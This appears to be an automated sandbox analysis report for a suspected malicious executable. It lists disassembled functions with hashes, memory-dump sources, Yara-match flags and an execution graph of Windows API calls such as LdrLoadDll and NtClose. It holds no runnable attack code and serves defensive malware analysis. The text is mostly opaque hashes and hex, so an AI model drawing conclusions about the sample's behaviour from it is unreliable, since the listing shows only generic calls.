                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 98R
                                                              • API String ID: 0-576591972
                                                              • Opcode ID: 42c8044903f4ad7fcb69bccf9ecf3dd31dac19372227f44cabe3a8d554a6a960
                                                              • Instruction ID: 806e816d6514c29e706f267e73c962196d7f6825c16dbb9da19cfa23b7dbbdd2
                                                              • Opcode Fuzzy Hash: 42c8044903f4ad7fcb69bccf9ecf3dd31dac19372227f44cabe3a8d554a6a960
                                                              • Instruction Fuzzy Hash: FB7168B5E1420ADFDB18CFA9D4859AEFBB5FF89310F10842AD418AB314D3389A51CF95
                                                              Function 0737C250 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: iUfo
                                                              • API String ID: 0-3820436262
                                                              • Opcode ID: 7ec1c9d37d9b780cce08f4136ea4d085e294a0e38e9af7a325a29cc0e9595cc6
                                                              • Instruction ID: e15cf33c1a32aee510c94bd4fd7f82ca3bef4a608affdda862f4a57f9832cdf5
                                                              • Opcode Fuzzy Hash: 7ec1c9d37d9b780cce08f4136ea4d085e294a0e38e9af7a325a29cc0e9595cc6
                                                              • Instruction Fuzzy Hash: 6F5123B4E102199BDF18CFE9D5455EEBBFABF89300F10942AE805B7254EB385941CF64
                                                              Function 0737C820 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: w7e^
                                                              • API String ID: 0-1657886525
                                                              • Opcode ID: a849eba9db3aa6e84535e8dac572872e633e8db68119159465c8339c0c43fbf4
                                                              • Instruction ID: bfbdbe7dfce978769eb27c82e66e036766278d270ffd45f2e5248929fb06f660
                                                              • Opcode Fuzzy Hash: a849eba9db3aa6e84535e8dac572872e633e8db68119159465c8339c0c43fbf4
                                                              • Instruction Fuzzy Hash: 085146F4D1520ADFDB14CFA9C5815EEFBB9FB89201F24A56AC01AB7240D7388642CF64
                                                              Function 0737C241 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: iUfo
                                                              • API String ID: 0-3820436262
                                                              • Opcode ID: efab5912dc7370f3dbe8766c6035e859f87e29ebecd1ae0a3f3ec04deb54c793
                                                              • Instruction ID: 499106a42d4319404e3e8fd41371b8892148381c2d9927c94d57c056ebcce40c
                                                              • Opcode Fuzzy Hash: efab5912dc7370f3dbe8766c6035e859f87e29ebecd1ae0a3f3ec04deb54c793
                                                              • Instruction Fuzzy Hash: B65135B5E102199FDF18CFE9D5456EDFBF6BF89300F10942AE805A7254EB388A41CB64
                                                              Function 0737C638 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: w7e^
                                                              • API String ID: 0-1657886525
                                                              • Opcode ID: 67e8f34cf0f3bfdd548d1ab0a9de6d3b8f427b22249236c1686cbf8718fe9130
                                                              • Instruction ID: a098243d124cc8bdf03a8b5ce8828aba8b6253e469775365fa6c188a9ad8df88
                                                              • Opcode Fuzzy Hash: 67e8f34cf0f3bfdd548d1ab0a9de6d3b8f427b22249236c1686cbf8718fe9130
                                                              • Instruction Fuzzy Hash: D64135F0D15209DFDB14CFAAC8806EEFBB9FB8A201F14A42AC409B7254D7384641CF68
                                                              Function 0737C648 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: w7e^
                                                              • API String ID: 0-1657886525
                                                              • Opcode ID: 0b6a4af709a9e4c1bb9e037a1fca86341378d3df0ccea5d71d374bc10fa62c00
                                                              • Instruction ID: ee9e93d5c09fd369b22645db84ec882f8f10a4e6b234e19e573c4e7ccbd6d420
                                                              • Opcode Fuzzy Hash: 0b6a4af709a9e4c1bb9e037a1fca86341378d3df0ccea5d71d374bc10fa62c00
                                                              • Instruction Fuzzy Hash: 8F4106F4D15219DFDB14CFAAC4805EEFBB9FB89201F14A52AC41ABB254D7384642CF68
                                                              Function 07378D29 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0ni
                                                              • API String ID: 0-1488673370
                                                              • Opcode ID: da93062aec5b1c63af53c1c08a036eacb1c727b1801ca64928d5656b2ba9a02c
                                                              • Instruction ID: a86ff1b337523d7364e21e4838c0b6dae0a809979151d09ac91e617b14b4a7b0
                                                              • Opcode Fuzzy Hash: da93062aec5b1c63af53c1c08a036eacb1c727b1801ca64928d5656b2ba9a02c
                                                              • Instruction Fuzzy Hash: 16516EB1E046188BEB58CF6BD94579AFBF7BFC8300F14C1BA950CA6214EB341A858F11
                                                              Function 00EAD74C Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e26befab75821b56779f5656677fdc41867a9825d258495758462dcb7d1cecf
                                                              • Instruction ID: 87556f0e4436fcae98ddf68630067569d0211bf00a82abfa8d91c436c13d810a
                                                              • Opcode Fuzzy Hash: 8e26befab75821b56779f5656677fdc41867a9825d258495758462dcb7d1cecf
                                                              • Instruction Fuzzy Hash: 75A16C36A002198FCF19DFA4C88059EBBF2FF8A304B15456AE806BF255DB75E945CB80
                                                              Function 073774B8 Relevance: .2, Instructions: 196COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3887d8f2525e8064a70dc7b7360d2a4dafa69c6de4d2d3ea2bbe2517a4ee76f7
                                                              • Instruction ID: 1490dbccb6f19d82e848feb699952ba150ca5fda07a251f656058191bb638244
                                                              • Opcode Fuzzy Hash: 3887d8f2525e8064a70dc7b7360d2a4dafa69c6de4d2d3ea2bbe2517a4ee76f7
                                                              • Instruction Fuzzy Hash: 7B9114B4A24219CFDB14CFA9C5848AEFBF5FF89314F249969D419AB720D334AA41CF50
                                                              Function 073774A8 Relevance: .2, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: de1a7a2e595b6e54035870d539ab17f3751ea5dacd2c4bea4b5bbd0418e35952
                                                              • Instruction ID: b91bff06713a1e163a23bfe7f1c35318b01e2840e7ac66837b9cf8cb7e3cc4fe
                                                              • Opcode Fuzzy Hash: de1a7a2e595b6e54035870d539ab17f3751ea5dacd2c4bea4b5bbd0418e35952
                                                              • Instruction Fuzzy Hash: 1A8117B4A25219CFDB14CFA9C5848AEFBF1FF89314F148966D019AB720D334AA41CF51
                                                              Function 0737C9F9 Relevance: .2, Instructions: 188COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 573e1228f931fcbe777fa63224626e8bf579ee019c00d4d0e1f7f112b855ba0f
                                                              • Instruction ID: 499314372eae144f9d0c87824ac6e681a546cce2efd189b6fb2c6118c2187a83
                                                              • Opcode Fuzzy Hash: 573e1228f931fcbe777fa63224626e8bf579ee019c00d4d0e1f7f112b855ba0f
                                                              • Instruction Fuzzy Hash: 5B816DB0E141198FDB14DF69C5809AEFBF6FF89304F24D1A9D418A7216D734AA81CF61
                                                              Function 073788B9 Relevance: .2, Instructions: 177COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1fec68d838ca4564fdca0eb75ad893f6837a385ce9ceaa51c336cc521fa0525
                                                              • Instruction ID: 48be40b879aef69d75f0a8e4168614a64252849311a310a17887ae1adb7d3c76
                                                              • Opcode Fuzzy Hash: c1fec68d838ca4564fdca0eb75ad893f6837a385ce9ceaa51c336cc521fa0525
                                                              • Instruction Fuzzy Hash: 4C7148B4E15609CFDB54CFAAC5844DEFBF2FF8A210F24942AD409B7254D334AA42CB65
                                                              Function 073788C8 Relevance: .2, Instructions: 173COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 73d01535e9fc04f1ea33a029b14e688ae62ed58bc07442391e9d9fa3c00602f9
                                                              • Instruction ID: bb509ae7b75db52ce5581b1ee71cd5bd34a2791209a093148be634762923de6e
                                                              • Opcode Fuzzy Hash: 73d01535e9fc04f1ea33a029b14e688ae62ed58bc07442391e9d9fa3c00602f9
                                                              • Instruction Fuzzy Hash: B67126B4E15209CFDB14CFAAC5844DEFBF2FF8A210F24942AD409B7214D334AA41CB65
                                                              Function 07378B49 Relevance: .1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 17a1bebe4b1806e3fa8cbfa31c0817ab41915e7bc04e8d7c2b7b8de712c59393
                                                              • Instruction ID: e5bb032955e7dbafce287e7433c6ed744ddce091833215638300ead0723d5769
                                                              • Opcode Fuzzy Hash: 17a1bebe4b1806e3fa8cbfa31c0817ab41915e7bc04e8d7c2b7b8de712c59393
                                                              • Instruction Fuzzy Hash: 704116F0E1520A9FEB14CFA9C4855EEFBF6EF89310F24C56AC409A7214D7349A41CBA5
                                                              Function 07378B58 Relevance: .1, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a7716877f3ad7d4a7efa53a98034cd95d835f0f328a3c3db9534c95c44e94b4b
                                                              • Instruction ID: 26e13ce2a835bdfeca6a1402a35561f8fbfe3febdf093c2b486ef145bc5c23f3
                                                              • Opcode Fuzzy Hash: a7716877f3ad7d4a7efa53a98034cd95d835f0f328a3c3db9534c95c44e94b4b
                                                              • Instruction Fuzzy Hash: BD41F3F0E1520ADBDB44CFAAC5855EEFBF6AF88310F24C56AC409A7314D7349A41CBA5
                                                              Function 0737BF10 Relevance: .1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e31f5cac5fbb9ab52218867d628eb166de9e4d0f38550526c20a697a803e8bd
                                                              • Instruction ID: 322ee8097d18c4960899411f864339f35549d40048e2ecff8d06bceec5a644e7
                                                              • Opcode Fuzzy Hash: 5e31f5cac5fbb9ab52218867d628eb166de9e4d0f38550526c20a697a803e8bd
                                                              • Instruction Fuzzy Hash: FF412AB0E1620ADFDB54CFA6C5416AEFBF5AF89300F20946AC019B7264E3789741CF95
                                                              Function 0737BF00 Relevance: .1, Instructions: 104COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bcf29e947142edddab09968c6e9e9401f3532e1a4926376d5adc7266188041d9
                                                              • Instruction ID: 47b2777687e69d4538faef7bea9069de9317646916a5c4b26a0722eb5a8b5739
                                                              • Opcode Fuzzy Hash: bcf29e947142edddab09968c6e9e9401f3532e1a4926376d5adc7266188041d9
                                                              • Instruction Fuzzy Hash: 88414AB0E1620ADFDB54CFA5C5416AEFBF6AF89300F20956AC019B7264E3788641CB95
                                                              Function 073786B0 Relevance: .1, Instructions: 104COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ce30d23feccfed93f44dc7a0ec009996b25336bf6ccfde0e7f32c67158a6f90a
                                                              • Instruction ID: 92997c127787781495e059457e8496b11c8b96181265c84ca8440e2eb4ae1bac
                                                              • Opcode Fuzzy Hash: ce30d23feccfed93f44dc7a0ec009996b25336bf6ccfde0e7f32c67158a6f90a
                                                              • Instruction Fuzzy Hash: 724109B0D0420A9FDB44CFAAD4855EEFBF2BF89300F14C42AD419A7654D7389A41CF90
                                                              Function 073786C0 Relevance: .1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e46dc5260ac9ada5163820e2357492970263ab5b0a07330e513b22111149fe6
                                                              • Instruction ID: 89a63c2429fc12ef2034b682cf31fe7a8b8abbf4de0899543ab3728980e9ab96
                                                              • Opcode Fuzzy Hash: 8e46dc5260ac9ada5163820e2357492970263ab5b0a07330e513b22111149fe6
                                                              • Instruction Fuzzy Hash: 5641E5B0D1520ADBDB44CFAAC4856EEFBF6BF89300F14C42AC419AB654D7389A41CF94
                                                              Function 07373793 Relevance: .1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: becf58e48e856e2187abbdcddcdc76b94e7ca2a1dd6e2ef3f43c9a13808a0a26
                                                              • Instruction ID: 78836d6128da0e6a8ced40e41dece172ca27cab309d1fba01893cf861f112118
                                                              • Opcode Fuzzy Hash: becf58e48e856e2187abbdcddcdc76b94e7ca2a1dd6e2ef3f43c9a13808a0a26
                                                              • Instruction Fuzzy Hash: 1721CCB1E006589BEB58CF6BDC0179EFAF7AFC9300F18C07AD418A6254EB345A458F55

                                                              Execution Graph

                                                              Execution Coverage:1.2%
                                                              Dynamic/Decrypted Code Coverage:5.1%
                                                              Signature Coverage:8%
                                                              Total number of Nodes:138
                                                              Total number of Limit Nodes:11
                                                              execution_graph 93964 42fa63 93965 42fa73 93964->93965 93966 42fa79 93964->93966 93969 42eaa3 93966->93969 93968 42fa9f 93972 42cc63 93969->93972 93971 42eabb 93971->93968 93973 42cc7d 93972->93973 93974 42cc8b RtlAllocateHeap 93973->93974 93974->93971 93975 4250a3 93980 4250bc 93975->93980 93976 425149 93977 425104 93983 42e9c3 93977->93983 93980->93976 93980->93977 93981 425144 93980->93981 93982 42e9c3 RtlFreeHeap 93981->93982 93982->93976 93986 42cca3 93983->93986 93985 425114 93987 42ccbd 93986->93987 93988 42cccb RtlFreeHeap 93987->93988 93988->93985 94076 424d13 94077 424d2f 94076->94077 94078 424d57 94077->94078 94079 424d6b 94077->94079 94080 42c953 NtClose 94078->94080 94081 42c953 NtClose 94079->94081 94082 424d60 94080->94082 94083 424d74 94081->94083 94086 42eae3 RtlAllocateHeap 94083->94086 94085 424d7f 94086->94085 94087 42bfb3 94088 42bfcd 94087->94088 94091 1392df0 LdrInitializeThunk 94088->94091 94089 42bff2 94091->94089 94092 41b653 94093 41b697 94092->94093 94094 41b6b8 94093->94094 94095 42c953 NtClose 94093->94095 94095->94094 94096 41a8f3 94097 41a90b 94096->94097 94099 41a962 94096->94099 94097->94099 94100 41e833 94097->94100 94101 41e859 94100->94101 94105 41e94d 94101->94105 94106 42fb93 94101->94106 94103 41e8eb 94104 42c003 LdrInitializeThunk 94103->94104 94103->94105 94104->94105 94105->94099 94107 42fb03 94106->94107 94108 42eaa3 RtlAllocateHeap 94107->94108 94109 42fb60 94107->94109 94110 42fb3d 94108->94110 94109->94103 94111 42e9c3 RtlFreeHeap 94110->94111 94111->94109 94112 4143b3 94113 4143cd 94112->94113 94118 417b63 94113->94118 94115 4143e8 94116 41442d 94115->94116 94117 41441c PostThreadMessageW 94115->94117 94117->94116 94119 417b87 94118->94119 94120 417b8e 94119->94120 94121 417bca LdrLoadDll 94119->94121 94120->94115 94121->94120 94122 1392b60 LdrInitializeThunk 94123 4190f8 94124 42c953 NtClose 94123->94124 94125 419102 94124->94125 93989 40192a 93990 40192e 93989->93990 93991 40198b 93990->93991 93994 42ff33 93990->93994 93992 401a50 93992->93992 93997 42e573 93994->93997 93998 42e599 93997->93998 94009 407403 93998->94009 94000 42e5af 94008 42e60b 94000->94008 94012 41b463 94000->94012 94002 42e5ce 94003 42e5e3 94002->94003 94027 42cce3 94002->94027 94023 428563 94003->94023 94006 42e5fd 94007 42cce3 ExitProcess 94006->94007 94007->94008 94008->93992 94030 416823 94009->94030 94011 407410 94011->94000 94013 41b48f 94012->94013 94048 41b353 94013->94048 94016 41b4d4 94019 41b4f0 94016->94019 94021 42c953 NtClose 94016->94021 94017 41b4bc 94018 41b4c7 94017->94018 94054 42c953 94017->94054 94018->94002 94019->94002 94022 41b4e6 94021->94022 94022->94002 94024 4285c5 94023->94024 94025 4285d2 94024->94025 94062 4189c3 94024->94062 94025->94006 94028 42cd00 94027->94028 94029 42cd11 ExitProcess 94028->94029 94029->94003 94031 416840 94030->94031 94033 416853 94031->94033 94034 42d393 94031->94034 94033->94011 94036 42d3ad 94034->94036 94035 42d3dc 94035->94033 94036->94035 94041 42c003 94036->94041 94039 42e9c3 RtlFreeHeap 94040 42d452 94039->94040 94040->94033 94042 42c01d 94041->94042 94045 1392c0a 94042->94045 94043 42c046 94043->94039 94046 1392c1f LdrInitializeThunk 94045->94046 94047 1392c11 94045->94047 94046->94043 94047->94043 94049 41b36d 94048->94049 94053 41b449 94048->94053 94057 42c093 94049->94057 94052 42c953 NtClose 94052->94053 94053->94016 94053->94017 94055 42c96d 94054->94055 94056 42c97b NtClose 94055->94056 94056->94018 94058 42c0b0 94057->94058 94061 13935c0 LdrInitializeThunk 94058->94061 94059 41b43d 94059->94052 94061->94059 94063 4189ed 94062->94063 94069 418edb 94063->94069 94070 414033 94063->94070 94065 418b0e 94066 42e9c3 RtlFreeHeap 94065->94066 94065->94069 94067 418b26 94066->94067 94068 42cce3 ExitProcess 94067->94068 94067->94069 94068->94069 94069->94025 94074 414050 94070->94074 94072 4140ac 94072->94065 94073 4140b6 94073->94065 94074->94073 94075 41b773 RtlFreeHeap LdrInitializeThunk 94074->94075 94075->94072 94126 413ebc 94127 413e64 94126->94127 94129 413ed0 94126->94129 94131 42cbd3 94127->94131 94132 42cbed 94131->94132 94135 1392c70 LdrInitializeThunk 94132->94135 94133 413e75 94135->94133

                                                              Executed Functions

                                                              Function 00417B63 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 388 417b63-417b7f 389 417b87-417b8c 388->389 390 417b82 call 42f5a3 388->390 391 417b92-417ba0 call 42fba3 389->391 392 417b8e-417b91 389->392 390->389 395 417bb0-417bc1 call 42e043 391->395 396 417ba2-417bad call 42fe43 391->396 401 417bc3-417bd7 LdrLoadDll 395->401 402 417bda-417bdd 395->402 396->395 401->402
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction ID: 122384901a9c5e31b0cbf47cd83ed5cb9323d92cb62f98cf8b450b2778bc3db3
                                                              • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction Fuzzy Hash: D60171B1E0420DBBDF10DBE1DC42FDEB3789B14308F4081AAE90897241F639EB588B95
                                                              Function 0042C953 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 414 42c953-42c989 call 404643 call 42db53 NtClose
                                                              APIs
                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C984
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                              • Instruction ID: a1a1041c0e6c1b94269db6ff4cf73d3451205fe7691f058a31b8fa4964ffe1e3
                                                              • Opcode Fuzzy Hash: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                              • Instruction Fuzzy Hash: 2EE08676300614BBD510FA5ADC01F97775CEFC6714F404419FA4867341D675B91487F4
                                                              Function 01392B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c6eca65387f8cbd2d3c2ecae69a11608095565f434516c40ee3437ed5c8a0c33
                                                              • Instruction ID: 54a94143255f7bc2a3254bdae96c69da31920ee960dee43c8729d1ec4aa2afd0
                                                              • Opcode Fuzzy Hash: c6eca65387f8cbd2d3c2ecae69a11608095565f434516c40ee3437ed5c8a0c33
                                                              • Instruction Fuzzy Hash: 249002A5702400039105719C4428616400AD7E0206B95C061E1014590DC52589956225
                                                              Function 01392DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: de84c5f1486a8744120141c62cd42a792421830de351d96922f841ea01fffa41
                                                              • Instruction ID: f193408a96201cc406d6266fe2dc7023656c9b259da8def7772700b1ec20108f
                                                              • Opcode Fuzzy Hash: de84c5f1486a8744120141c62cd42a792421830de351d96922f841ea01fffa41
                                                              • Instruction Fuzzy Hash: 9890027570140413E111719C45187070009D7D0246FD5C452A0424558DD6568A56A221
                                                              Function 01392C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: ff51e7a7a7f54927ac60b3b70d5913199a773f50f37a3c314737d6c173f49829
                                                              • Instruction ID: 715e9fe4aa3288be8eb4ff8cccbe8c5c67837b29eccb0878c366be8cdb5b50a0
                                                              • Opcode Fuzzy Hash: ff51e7a7a7f54927ac60b3b70d5913199a773f50f37a3c314737d6c173f49829
                                                              • Instruction Fuzzy Hash: 4090027570148802E110719C841874A0005D7D0306F99C451A4424658DC69589957221
                                                              Function 013935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 1d9cac39d44b0b58d2998c6013f9c15776d01e32050135424077ffa3ae8e5779
